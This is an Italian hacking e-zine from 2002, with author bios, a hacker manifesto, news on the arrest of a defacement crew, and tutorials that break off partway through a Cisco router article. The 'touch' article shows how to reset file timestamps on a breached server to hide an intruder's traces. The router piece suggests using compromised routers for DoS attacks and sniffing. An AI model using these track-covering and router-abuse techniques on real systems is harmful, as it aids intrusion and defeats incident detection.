Copy Link
Add to Bookmark
Report

X-System 00

eZine's profile picture
Published in 
XSystem
 · 26 Apr 2019

  


X-SYSTEM E-ZINE N°0

20 GENNAIO 2002

010101010101010101010101010101010101010101010101010101010101010101
010101010101010101010101010101010101010101010101010101010101010101
010101010101010101010101010101010101010101010101010101010101010101
0101010101/ \01010101010101
010101010/ \1010101010101
01010101| X - S Y S T E M E - Z I N E |010101010101
010101010\ /1010101010101
0101010101\ /01010101010101
010101010101010101010101010101010101010101010101010101010101010101
010101010101010101010101010101010101010101010101010101010101010101
010101010101010101010101010101010101010101010101010101010101010101

system:/ # mycontrol

the system control everything...

the system controls you...

OS version 156455.15645.154

Can I help you?

system:/ # No, thanks!

Ok, good work... ;)

system:/ # cat x-sys0

[.......Loading.......]

. . : : [ E-zine nata il 19 Novembre 2001 ] : : . .

. . : : [ Redattori: Elektro e Marvin ] : : . .

. . : : [ Argomenti trattati ] : : . .

Anarky | CyberInfo | Cracking | Elettronica | Intro | Hacking | Hacking
Satellitare | Phreaking | Programmazione | Saluti |

. . : : [ Indice ] : : . .

****************************************************************************
* *
* X-SYSTEM E-ZINE N° 0 *
* *
****************************************************************************
* TITOLO * AUTORE *
****************************************************************************
* ( . . . INTRO & VARIE . . . ) *
****************************************************************************
* ChI SiAmO & CoSa VoGlIaMo! ;) Elektro e Marvin *
* *
* UnA bElLa iNtRo AlLa X-SyS e-ZiNe Elektro *
* *
* M@nIfEsT0 Elektro *
* *
* CYbErInFo Marvin ed Elektro *
* *
* La PoStA dEi LetToRi Lettori e Redazione*
* *
* AlLeGaTi Elektro *
* *
* PrOgEtTi Elektro * *
****************************************************************************
* ( . . . H A C K I N G . . . ) *
****************************************************************************
* Il CoMaNdO ToUcH PeR i NoStRi ScOpI! ;) Elektro *
* *
* I cIsCo RoUtEr Elektro *
* *
* MuLtIpRoXy Elektro *
* *
* FrEgArE i FiLe Di PaSs DeI pC pRoTeTti... Raptor_ *
* *
* CoMe è StRuTtUrAtO uN eXpLoItS sU BuFfeR OvErFlOw e4m *
* *
* BuFfUr OvErFlOw - EsEmPiO ChIaRo e4m *
* *
* RiToRnAnDo AlL'OvErFlOw e4m *
* *
* GuIdA aL sOcIaL EnGinNeEring... Parte 1 M3xican *
* *
* GuIdA aL sOcIaL EnGinNeEring... Parte 2 M3xican *
* *
* NeTsTaT M3xican *
****************************************************************************
* ( . . . CRACKING . . . ) *
****************************************************************************
* ScRiViAmO uNa PaTcH! e4m *
****************************************************************************
* ( . . . PHREAKING . . . ) *
****************************************************************************
* ScRoCcArE CoN i CeLl Elektro *
* *
* AbUsO Di SeGrEtErIe tElEfOnIcHe Elektro *
****************************************************************************
* ( . . . LINUX . . .) *
****************************************************************************
* MaStErIzZaRe SoTtO LiNuX Bartx *
* *
* PrEmEsSa Elektro *
* *
* StOrIa Elektro *
* *
* CaRaTtErIsTiChE TeCnIcHe Elektro *
****************************************************************************
* ( . . . PROGRAMMAZIONE . . . ) *
****************************************************************************
* C++ : Le BaSi Marvin *
* *
* CoMe FaRe UnA bAcKdOoR iN vB! HolyHack *
* *
* GuIdA aL mYsQl CoN pHp BiGAlex *
* *
* HoW tO uSe WiNsOcK! e4m *
* *
* HeX 2 AsCiI BiGAlex *
****************************************************************************
* ( . . . ETICA & RIFLESSIONI . . . ) *
****************************************************************************
* MaTrIx NoN eSiStE. O fOrSe Si? BiGAlex *
* *
* HaCkErS? Elektro *
* *
* Il LaMaH Di TuRnO... Elektro *
* *
* Il LaMeR FaStIdIoSuS Marvin *
* *
* CoNtRoPoPaGaNdA Su LiNuX Marvin *
****************************************************************************
* ( . . . SALUTI, FUCK, RINGRAZIAMENTI, DI TUTTO DI PIU' . . . ) *
****************************************************************************
* SaLuTi & RiNgRaZiAmEnTi Elektro *
* *
* DoVe TrOvArCi Elektro *
* *
* CoMe InViArE i VoStRi ArTiCoLi Elektro *
* *
* LiNkS Marvin ed Elektro *
* *
* ThE EnD Elektro *
****************************************************************************


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| C H I S I A M O |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Facilmente molti di voi non ci conoscono. Perciò mi sembra giusto presentarci,
o meglio dirvi solo quel che probabilmente vi può interessare, magari solo per
capire qual è il nostro livello tecnico e cosa sappiamo fare.

-------
Elektro
-------

Sono giovane e mi piace passare il tempo davanti al PC, magari solo per
scrivere qualche cazzata ;) o per fare qualche lavoro un po' più serio, per il
solo gusto di mettermi alla prova e vedere ciò che in realtà riesco a fare con
il mio impegno e la mia intelligenza.
Ho sempre avuto la passione dell'elettronica fin da 4 anni, tanto che appena
mi regalavano un qualsiasi piccolo gioco elettronico lo smontavo e osservavo
con 'amore' tutti i circuiti e cavi elettrici che si trovavano all'interno,
senza però capire na' mazza di ciò che guardavo! ;D
A 6-7 anni cominciai a innamorarmi dei PC e dei computer, che magari vedevo
alla TV o a casa di qualche parente/amico... Mio padre, però, nonostante le
insistenze mi promise di comprarmelo solo se fossi passato con ottimi voti
dalla 5 elementare in 1 media. Passarono così gli anni e ricevetti il primo
computer all'età di 11 anni, nel luglio '97: ricordo bene quell'estate con le
mie 3 ore giornaliere davanti allo schermo che mi parevano un'eternità in
confronti ai miei amici che erano limitati dai genitori, ma che ora mi fanno
solo ridere, poichè nell'ultima estate arrivavo a punte di 13-14 ore al
giorno (per favore, non scrivetemi dicendo che sono fumato.. Tanto lo so che
voi fate lo stesso.. ;DD)... ;-) Poi a 12 anni arrivò il mio primo modem e
qualche mese dopo scoprii i cosidetti 'Sotterranei informatici', l'ambiente
Underground, l'Hacking e piano piano cominciai a conoscere persone sempre più
in gamba... Due, tre mesi dopo cominciai a lavorare ad un sito,
MondoHackers.cjb.net, che tra l'altro ora ha lasciato il posto a
X-System.cjb.net, dove ho reso disponibile molto più materiale e penso di
mantenerlo il più aggiornato possibile. Inoltre negli ultimi tempi, oltre al
progetto del mio sito sto lavorando anche a questa e-zine e alla X-System Crew
- Progetto AntiPedofilia (vedi il mio sito ;)).
Attualmentre, mentre lotto per un 7 a scuola a fine anno per avere il PC
nuovo, il masterizzatore e l'account flat ;), mi interesso prevalentemente
all'Hacking, alla gestione e configurazione di sistemi Linux e alla
programmazione in C (linguaggio che per ora conosco poco: mi è arrivato il
manuale pochi giorni fa ma lo sto divorando... ;)).
Per tutti quelli che avessero voglia di fare due chiacchiere con me, la mia
mail è teo1987@libero.it. Cerco di rispondere a tutti, tempo libero
permettendo! ;)
Ah, dimenticavo, visitate X-System.cjb.net!
Byez

------
Marvin
------
Sono un pessimo soggetto,dedito al culto di Kali,ma con una passione per i pc
nata anni fa.
Adoro torturare le mie membra davanti ad un monitor solo per l'insano gusto di
smanettare.


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| C O S A V O G L I A M O |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Da voi nulla di certo... Lavoriamo semplicemente a questa e-zine con la
speranza che possa essere utile a qualcuno di voi e che possa insegnare
qualcosa di utile...
NON siamo hacker, e molto probabilmente nessuno che scriva articoli in questa
e-zine lo è, siamo solo giovani e intraprendenti smanettoni italiani con la
passione per i PC e la voglia di stare incollati parecchio tempo allo schermo
nella speranza di divertirci un po' in questo modo...


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| I N T R O |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Salve a tutti!
Probabilmente vi starete chiedendo perchè una nuova e-zine.
Da quanto ho sentito nei mesi di Ottobre-Novembre si sono formate ben 4 e-zine
compresa questa. Non vi sembrano troppe? A mio parere, beh, forse si.. Ma c'è
anche qualcosa di positivo. Cosa? Nell'ambiente Underground italiano, tutto
questo formarsi e disgregarsi di e-zine e crew crea sicuramente molta
confusione. Ma a mio parere in tutto questo c'è anche qualcosa di positivo. Ad
esempio quando ho iniziato a chiedere ad amici se avrebbero potuto scrivermi
qualche testo poichè avevo formato una nuova e-zine, molti mi dissero che
erano già impegnati in altre e-zine. Ma ci sono anche quelli che volentieri si
sono messi a scrivere (o che stanno tutt'ora scrivendo per passarmi gli
articoli quando uscirà il numero 1 di questa e-zine... ;)) per passarmi gli
articoli che ora potete leggere in questo documento. Questi ultimi sono stati
"spronati" (cazzo.. non so se questo sia un termine italiano o dialettale..
beh, tanto voi siete bravi e capite lo stesso.. ;)) e hanno "prodotto"
(lasciatemi usare questo termine) qualcosa in più per l'ambiente Underground
italiano. Ci si lamenta che esistono pochi tutorials in lingua italiana, ma
perchè ci si lamenta anche dell'esistenza di molte e-zine? In fin dei conti,
se queste da un lato creano caos per il loro formarsi e disgregarsi,
dall'altro lato hanno la conseguenza di produrre più testi, più tutorials
proprio come tutti noi vorremmo. Sbaglio forse? E tutte queste crew? Già anche
queste creano caos ma d'altra parte anche queste permettono ai newbyes d'oggi
di entrare in contatto con l'Underground informatico e dopo poche settimane di
studio e d'apprendimento, possono entrare a far parte di crew con competenze e
conoscenza più o meno tecniche; e questo non è da sottovalitare: penso,
infatti, sia molto importante far parte di un gruppo, con il quale si può
scambiare informazioni e imparare l'uno dall'altro.
Ecco il perchè della nascita della 1000ima e-zine italiana.

Altro giro altra corsa... Voglio farvi notare che chiunque può scrivere per
quest'e-zine! Non occorre infatti essere membri di una crew per scrivere e
pubblicare i vostri articoli! Chiunque ce li può mandare alla mail
x-system@email.it; i testi verranno poi letti e giudicati da me e Marvin e se
saranno tutorials interessanti verranno pubblicati!

Io con l'intro ho finito raga... Che dirvi... Ah, già, dimenticavo, io e
Marvin ci siamo posti un limite massimo tra un'uscita e l'altra. Infatti
quest'e-zine uscirà circa ogni 2 mesi, comunque vi assicuro che non passeranno
60 giorni tra un numero e l'altro!
Byez all.


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| M A N I F E S T O |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Quello che potete leggere qui sotto è il mio manifesto, già pubblicato su
MondoHackers.cjb.net e X-System.cjb.net.

Se avete voglia e tempo di leggerlo, leggetelo pure! ;)
Buona Lettura.

N.B. Per evitare disguidi fin dall'inizio, con la parola "Hackers", in questo
manifesto, sottintendo gli smanettoni e chiunque si interessi seriamente
all'Underground informatico, ma io non mi ritengo affatto hackers nel vero
senso della parola.

\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Lottiamo per la libertà d'informazione...

Apprendiamo e impariamo tutto quello che Voi, per paura, ci negate...

Esploriamo e scopriamo un mondo che Voi cercate di sopprimere con la forza...

Crediamo nei nostri ideali...

Siamo "Hackers", portiamo questo nome, ma Voi ci chiamate più comunemente
"Criminali"...

Ma ricorda, puoi fermare me ma non tutti noi, perchè noi siamo più forti di
te, la Conoscenza è il nostro credo e la nostra vita stessa; e finchè noi
saremo attratti dalla Conoscenza saremo sempre i più forti, perchè il "Sapere"
ci affascina ed è un diritto inalienabile dell'uomo...

Ricorda, "Sapere è potere"! Non dimenticarlo mai! Mai!
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Elektro


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| C Y B E R I N F O |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Eccoci al nostro bimensile quotidiano di informazione telematica, per dare
voce a tutto ciò che televisioni, radio, giornali e mass-media in generale non
dicono, un po' perchè sono troppo impegnati a parlare di politica,
dell'Italia berlusconiana e dell' "Avvento Euro" e un po' perchè exploit e
patch rilasciate, release di nuove versioni linux e company, non sono poi di
molto grande interesse per la popolazione comune, che pensa solo a mangiare,
divertirsi e trombare (beh.. quello pure io... ;)).

Eccovi le ultime notizie fresche (o quasi):

(per molte info si ringrazia una delle mie riviste preferite, ovvero Linux & C
;))

-Intel annuncia (direi con molta arroganza e strafottenza...) di avere la
tecnologia necessaria per la nuova generazione (la 5°) di processori di classe
Pentium della famiglia x86.L'azienda leader nel settore dell'hardware dichiara
che i nuovi processori avranno una frequenza di clock di circa 20 Ghz

-Si affacciano e sfondano la scena dei defacers italiani i ReservoiDog.Si sono
fatti notare per il defacign di Cepuweb e per la locandina dell'omonimo film di
Quentin Tarantino che lasciano sul luogo del "misfatto".

- Nei giorni del G8 avevano aggredito centinaia di
siti in Italia e all'estero. La Guardia di Finanza ieri notte ha concluso la
sua indagine fermando sei ragazzi tra i 15 e i 23
anni. Un reato da tre anni di carcere.
16/01/02 - News - Roma -
Che fossero italiani s'era capito e ora le autorità sanno anche come si
chiamano: sono i componenti della crew di cracker Hi-Tech Hate che si è fatta
sentire nei giorni del G8 di Genova per l'aggressione a numerosi siti
istituzionali in Italia e all'estero.
La Guardia di Finanza, che ha condotto in queste settimane le indagini
necessarie a risalire agli autori delle aggressioni telematiche, ha spiegato di
aver registrato attacchi via internet, da parte di Hi-Tech Hate, a centinaia
di siti sparsi in 62 paesi.
In uno dei numerosi assalti i membri della crew, dopo aver "disabilitato" le
protezioni su un server ANSA, avevano lasciato sulla pagina web modificata una
sorta di manifesto: "Noi colpiamo perché lottiamo contro la cattiva
informazione, non siamo né terroristi né ragazzi stupidi che non sanno quel
che fanno. Forse siamo cresciuti in fretta, ma siamo curiosi.
È un crimine essere interessati ad apprendere?"
. "Non vogliamo vivere nella
disinformazione o nell'ignoranza - continuavano - Non vogliamo che il mondo sia
guidato dalle multinazionali, non vogliamo un mondo così. Noi siamo contro
ogni forma di guerra, di oppressione, di abuso di potere"
.
Hi-Tech Hate in poche settimane ha "firmato" pagine modificate su server
istituzionali come quello del Senato, della Difesa e del ministero della
Sanità, nonché quelli di RAI e Mediaset. Si sono fatti vedere però anche su
server dei governi cinese, britannico, messicano e altri ancora, nonché su
quelli della NASA, della FAO e di università americane. Il clamore che non
hanno suscitato all'epoca dei fatti lo hanno invece sollevato ora, e di loro
si occupano in queste ore i media di mezzo mondo.
I sei ragazzi, di età compresa tra i 15 e i 23 anni, sono stati individuati
dal Gruppo anticrimine tecnologico del Nucleo speciale investigativo della
Guarda di Finanza che ha lavorato in coordinamento con la Procura della
Repubblica di Ravenna e il Tribunale dei Minori di Bologna.
Secondo la ricostruzione delle Fiamme Gialle, i sei ragazzi si sono conosciuti
online e si sono "traditi" quando l'incursione di tale "Ulisses 1" è stata
monitorata e tracciata dai server di un'azienda di Ravenna.
Ora tutti e sei sono accusati del reato di aggressione a sistemi informatici,
che prevede fino a 3 anni di carcere. Ma va detto, in considerazione dell'età
e della specificità delle azioni, che difficilmente finiranno dietro le
sbarre. Il Pubblico Ministero Gianluca Chiapponi ha infatti spiegato
che "bisogna considerare tante variabili che vanno dal fatto che sono giovani
e incensurati al tipo di rito adottato, all'incidenza di attenuanti e
aggravanti. Ci potrà essere la sospensione della pena o anche il
patteggiamento."
Secondo Chiapponi "i ragazzi non si aspettavano di essere
incastrati. La loro azione è stata di sfida, forse ispirata dal clima di
contestazione nato intorno al G8, ma non avevano finalità di carattere
commerciale o economico"
.
Lo spirito "costruttivo" che aleggia attorno ai ragazzi è stato ben esplicato
ieri sera da un rappresentante delle Fiamme Gialle che al TG1 ha
spiegato di sperare "di portarli dalla nostra parte", sottolineando i notevoli
skill tecnici messi in campo dalla crew.

# # # # # Info prese da punto-informatico.it # # # # #

E già... Cosa ne penso io? Magari non ve ne frega un cazzo ma la mia opinione
su tutto questo la voglio dire! Vi faccio un bel copia/incolla del pezzo di
una mail spedito ad un amico, dove ho risposto alla sua domanda di cosa ne
penso di quei sei...

# # # # #

> Ti scrivo per sapere cosa ne pensi dei 6 ragazzi arrestati pochi giorni
> fa per aver violato alcuni dei siti piu' importanti della rete.
> Mi piacerebbe sapere la tua opinione.


Uhmm che dirti... Le solite cose di sempre, la mia opinione riguardo a fatti
come questi non cambia mai! Il giornalismo (tv radio giornali e company) si
scalda... ma per cosa poi ?!?

Leggi le righe seguenti, tratte da punto-informatico.it :

---
Ora tutti e sei sono accusati del reato di aggressione a sistemi informatici,
che prevede fino a 3 anni di carcere. Ma va detto, in considerazione dell'età
e della specificità delle azioni, che difficilmente finiranno dietro le
sbarre.
---

Sono troppo giovani... Il + giovane ha 15 anni: cosa vuoi che gli facciano?
Ormai in Italia non fanno nulla nemmeno a chi ammazza la gente...

Leggi anche queste righe, sempre prese da punto-informatico :

---
Lo spirito "costruttivo" che aleggia attorno ai ragazzi è stato ben esplicato
ieri sera da un rappresentante delle Fiamme Gialle che al TG1 ha spiegato di
sperare "di portarli dalla nostra parte", sottolineando i notevoli skill
tecnici messi in campo dalla crew.
---

Sperare di portarli dalla nostra parte... Non gli faranno assolutamente
nulla. L'unica cosa che subiranno quei giovani ragazzi sono solo PESANTI
(questo si...) interrogatori e la pressione dei media che parlano di loro
come dei criminali. Tutto ciò farà smettere a loro tutta la voglia di bucare
e di interessarsi all'hack come se fosse uno sport. Credo proprio che quei
ragazzi da oggi in poi perdino la voglia di interessarsi all'Underground
informatico ma dei PC no assolutamente... ;-)
Comunque la GDF e le altre autorità non li manderanno in gattabuia stanne
certo!
Come quel giovane ragazzo ventenne (o giù di lì) olandese che ha scritto un
virus. L'hanno beccato e che gli hanno fatto? Una proposta di lavoro per una
nota società di informatica!!

# # # # #

E voi cosa ne pensate?
Visto che dopututto discutere di etica mi piace, e discussioni coem queste mi
attirano, vi invito a parlarne con me, gli altri visitatori del mio sito e
chiunque si volesse aggiungere al forum del mio sito (www.X-System.cjb.net
;))! Oppure speditemi una mail, se ho tempo io rispondo!

Si chiude qui CyberInfo. Lo so potevamo scrivere qualcosa in + ma purtroppo io
e Marvin siamo molto impegnati ultimamente! Promesso a tutti che nel numero 1
di questa ezine scriveremo molte + info!!

############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| LA POSTA DEI LETTORI |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Per ora ancora nulla! Beh, siamo solo alla prima uscita e fino a pochi giorni
fa quest'e-zine chi la conosceva? In pochi...

Comunque per tutti quelli che volessero porre domande all'e-zine, noi
pubblichiamo le vostre domande e vi rispondiamo. Se le domande sono molto
tecniche e non alla nostra altezza, le rivolgiamo a tutti i lettori
dell'e-zine, così che le vostre domande possano avere una risposta.
Spedite tutto a : x-system@email.it

Aspettiamo i vostri quesiti e le vostre domande! ;)


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| A L L E G A T I |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


fp.exe = è un programmino che interessa i lettori dell'articolo di Raptor. Se
leggete il suo articolo capirete di cosa si tratta!


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| P R O G E T T I |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


Cominciamo subito col definire cos'è e cosa vuol essere questa sezione. Non è
altro che una sezione dove in futuro prenderà il via (o almeno si spera) una
serie di progetti (come ad esempio la scrittura di un programma). Il progetto
(lasciatemi chiamarlo così) verrà qui pubblicizzato e chiunque potrà aiutare
l'autore del programma nella sua scrittura.

Chiunque voglia far vedere il suo nome qui assieme alla sua idea e richiesta
d'aiuto (o comunque una richiesta) può spedire tutto a x-system@email.it con
oggetto "Progetti".


############################################################################
01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101
0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0
010æ10@10Æ1ß01%01010&10ß| H A C K I N G |10%101ð0101|010:10&101
01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010
01<0101!1010+101"
010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01
############################################################################


|----------------------------------------------------------|
|Art. N° <1> : "Il Touch per i nostri scopi! ;)" di Elektro|
|----------------------------------------------------------|


******************************
IL TOUCH PER I NOSTRI SCOPI ;)
******************************
By Elektro
----------
Autore: <Elektro>
Mail: <teo1987@libero.it>
Web: <www.X-System.cjb.net>
Data: <31/10/01>

Salve a tutti!
Innanzitutto beccatevi un santo disclaimer. ;)

DISCLAIMER: Elektro, l'autore di questo articolo non si assume nessuna
responsabilità sull'uso ed abuso di ciò che può essere fatto dopo la
lettura di quest'articolo. Queste informazioni sono pubblicate, scritte e
distribuite da chiunque con unico scopo informativo, educativo e
didattico e NON per scopi illegali.

In questo testo vi parlerò di come eliminare le tracce che spessissimo
molti di noi non cancellano su un system remoto. ;)
Non tratterò dei file log e rispettivi tools in C (uno dei più famosi è
sicuramente Zap2, ma il mio preferito rimane hideme.c, vedi Bfi3), bensì
dell'utilità del comando touch su sistemi Unix-Linux.
Infatti quando noi, immettiamo il comando cat su un qualsiasi file di
testo, viene registrata la data e l'ora dell'ultima apertura di un file;
quindi se buchiamo un server e vogliamo fare i lavori fatti bene, dobbiamo
usare e conoscere l'utilità del comando touch, che ci permetterà di
cambiare l'ora dell'ultimo accesso su un file. NB: per utilizzare il
comando touch dovete ovviamente avere diritti di root.
Ma perchè noi dovremo cambiare la data e l'ora di un determinato
file? Semplice se noi lavoriamo su un server poco conosciuto e poco
visitato in piena notte, e per puro caso l'amministratore il giorno
dopo dovesse controllare gli ultimi accessi agli stessi file che voi
avete passato la notte prima, si chiederà come mai (a meno che non sia
scemo ;)) determinati file siano stati rovistati in piena notte per di più in
orari in cui secondo i log sul sistema non c'era nessuno..


Ma facciamo un esempio pratico:
Ho il root su un server qualsiasi (che ora il sottoscritto
indicherà con 127.0.0.1) e ci faccio un salto.

elektro@linux: > telnet
telnet> open
(to) 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Welcome to SuSE Linux 7.1 (i386) - Kernel 2.2.18 (4).

linux login: elektro
Password:
Last login: Wed Oct 31 13:36:17 from localhost
Have a lot of fun...
elektro@linux: > su
Password:
root@linux:/home/elektro

Quuesto è solamente un esempio: ci siamo loggati con lo user 'elektro'
(non come 'root', poichè la mia distro, come altre da tempo non accetta
login diretti con diritti d'accesso illimitati) e poi con 'su' siamo
diventati root.

A questo punto, se noi immettiamo il seguente comando:

root@linux:/home/elektro > cat /home/elektro/relazione

alle ore 13:40 se il sysadmin non è proprio scemo e controlla
con il 'metodo classico', lo stesso di Winz (click con il tasto destro sul
file
e Proprietà) vedrà che compare ora della creazione, dell'ultima
modofica e dell'ultimo accesso. Se voi da brave persone non avete
modificato il file, dovrete modificare solo l'orario dell'ultimo
accesso. Come fare? Eccovi qui sotto le opzioni principali, o meglio
quelle che ci interessano ;), del comamndo touch.

-a Cambia l'ora di accesso al file
-m Cambia l'ora di modifica al file
-t Cambia l'ora di accesso e modifica al file

Ovviamente queste opzioni devono essere seguite, dalla data che deve
essere così espressa:

root@linux:/home/elektro > touch -t 09151230 relazione

Con questo modo modifichiamo orario e data del file 'relazione'. Così,
se prima la data dell'ultimo accesso era fissata alle 14:40 del
31/10/01 ora sarà alle 12:30 del 15/09/01. Quindi come ben capirete
non occorre impostare l'anno (almeno per i nostri scopi ;)), il mese
viene identificato dalle prime due cifre (09), segue poi il giorno
(15) e infine l'orario (1230).

Come vedete non è nulla di difficile.
Per altre opzioni del comando touch, dalla vostra linuxbox digitate man
touch. ;)

CONCLUSIONI: l'articolo è concluso anche perchè non c'era poi molto
da dire. Questa tecnica di eliminazione delle tracce è davvero poco
usata e poco conosciuta. Certo penso sia ovvio chiedersi quando si
deve usare o meno questa tecnica; sicuramente in una o più delle
seguente occasioni:
- siete molto paranoici
- bucate un sistema molto importante e volete salvarvi il culo
- sapete che il sysadmin è un tipo attento
- volete fare i lavori fatti bene.
Ma per quanto mi riguarda penso che se non bucate sistemi parecchio
importanti non abbiate bisogno di usare il touch.
Comunque, se avete problemi o volete pormi una domanda, mailate pure
tutto a: teo1987@libero.it
Se avrò voglia e/o tempo vi risponderò altrimenti c'è sempre il
forum del mio sito e potete provare là. ;)
Byezz


|-----------------------------------------|
|Art. N° <2> : "I Cisco Router" di Elektro|
|-----------------------------------------|


Autore: Elektro
Web: www.X-System.cjb.net
Mail: teo1987@libero.it
Data : 02/01/02
Musica ascoltata : Radio Company Dance (Luca, mi devi ancora masterizzare Hit
Mania Dance! Cazzo..)

Titolo: I CISCO ROUTER

DISCLAIMER : Non mi assumo nessuna responsabilità sull'uso illegale, dannoso
e/o scorretto nell'applicazione delle informazioni contenute in questo
articolo. Se vi beccano e qualcuno vi fa il culo (o peggio rischiate di
passare il vostro futuro al fresco...), sono solo affari vostri, io pubblico
questo articolo con unico scopo educativo, informativo e didattico a
dimostrazione di quello che si può fare con un po' di intelligenza, culo (a
volte ci vuole anche quello... ;)), un computer, un modem e alcune conoscenze
di base della Rete e dei sistemi informatici.

Eh, si ragazzi... Oggi avevo proprio voglia di scrivere qualcosina. E così
dopo aver pensato l'argomento da trattare, mi sono deciso per i Cisco Router.

* Fonti *

Per la scrittura di questo articolo mi sono basato sulle seguenti fonti:

- "Cisco Router?... Si grazie" di Spider2k
- Documentazione del prog Bouson Router Simulator
- Conoscenze personali! ;-)

* Cosa sono e qualche info in più... *

Sono delle macchine collegate ad un server con la funzione di reindirizzamento
dei vari pacchetti. Infatti come spero sapete, in rete, viaggiano milioni di
pacchetti di informazioni: il compito di smistamento e reindirizzamento di
questi pacchetti, è in genere affidata proprio ai Cisco Router.

Proprio per il loro compito i Cisco Router devono avere connessioni con
velocità parecchio elevate (ad esempio una T3, velocità che arriva ai 43 MB al
secondo, non so se mi spiego... ;)), e quindi volendo utilizzare un Cisco
Router da noi bucato, potremmo effettuare attacchi di tipo Denial Of Services
verso altri sistemi. Ma a parte l'uso, forse un po' lamah, dei Router come
base per un attacco DOS, si può fare anche qualcosa di più complicato e
divertente... ;) Ovviamente, mi sto riferendo all'intercettazione dei
pacchetti che viaggiano all'interno dei Router... Mica male come cosa, no? In
genere, almeno per quanto ne so io, i pacchetti che potrete sniffare
(pacchetti.. sniffare.. sembra davvero droga.. ihihih ;)) sono criptati,
perciò una volta intercettati dovete decriptarli e qui in genere comincia il
casino... Uhmm.. Io in questo articolo e in quelli che seguiranno (penso
proprio di scrivere qualcos'altro sui router... ;D) vi insegnerò varie cose
parecchio interessanti ma questo mi sa proprio che ve lo lascio come compito a
casa... ;-))

Battute a parte dovete sapere che i Cisco Router hanno un loro prompt e dei
loro comandi. Forse una buona conoscenza dei sistemi Unix-like vi può aiutare,
ma in ogni caso se volete bucare un Cisco Router vi consiglio *vivamente* di
imparare e conoscere il più possibile questi comandi. Alcuni di questi,
verreanno spiegati proprio in questa guida da me, altri li spiegherò
successivamente in testi che seguiranno a questo tutorial, altri ancora potete
impararli voi.

* Come individuare un Router *

Poichè quasi tutti gli ISP usano un Cisco Router per il reindirizzamento dei
loro pacchetti, non è poi così difficile individuarli. Infatti basta usare un
semplice Traceroute: sotto DOS o sotto Linux il comando rimane invariato, e
cioè "traceroute ip", ovviamente senza virgolette e sostituendo "ip" con un
qualsiasi computer remoto (il formato dell'indirizzo può essere sia numerico,
cioè XXX.XXX.XXX.XXX, sia in formato standart, cioè www.unsitoacaso.it). Il
risultato di questo comando, lo dovreste sapere e non dovrei dirvelo io,
comunque visto che oggi sono parecchio buono ve lo dico ;) : otterrete una
lista con tutti i nomi dei computer (ovviamente nome ed indirizzo ip) ad esso
associati; se tra questi riuscite a trovare qualcosa che assomigli a 'cisco',
